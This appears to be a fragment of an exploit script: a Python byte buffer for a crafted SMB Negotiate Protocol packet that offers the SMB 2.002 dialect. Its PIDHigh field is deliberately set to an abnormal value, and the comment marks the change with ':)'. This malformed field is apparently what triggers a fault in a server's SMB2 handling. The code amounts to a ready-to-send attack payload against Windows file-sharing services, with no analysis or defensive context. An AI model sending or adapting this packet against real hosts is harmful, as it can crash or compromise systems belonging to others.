buff = (
	# NETBIOS Header ################################
	"\x00"			# Message Type : Session message
	"\x00"			# Flags 
	"\x00\x90"		# Count of data bytes (netbios header not included)

	# SMB Base Header ################################
	"\xff\x53\x4d\x42"	# Server Component: SMB
	"\x72"			# Negociate Protocol
	"\x00\x00\x00\x00"	# Status
	"\x18"			# Flags 
	"\x53\xc8"		# Flags2  
	"\x00\x26" 		# PIDHigh: --> :) normal value should be "\x00\x00" 
	"\x00\x00\x00\x00\x00\x00\x00\x00" 		# SecuritySignature
	"\x00\x00"		# Reserved
	"\xff\xff"		# TID
	"\xff\xfe"		# PIDLow
	"\x00\x00" 		# UID
	"\x00\x00"		# MID

	# SMB Command Header #############################
	"\x00"			# WordCount
					# ParameterWords[ WordCount ]

	# SMB DATA ####################################
	"\x6d\x00"		# ByteCount 
	"\x02\x50\x43\x20\x4e\x45\x54"   	# Buffer[ ByteCount ]
	"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
	"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
	"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
	"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
	"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
	"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
	"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
	"\x30\x30\x32\x00"
)
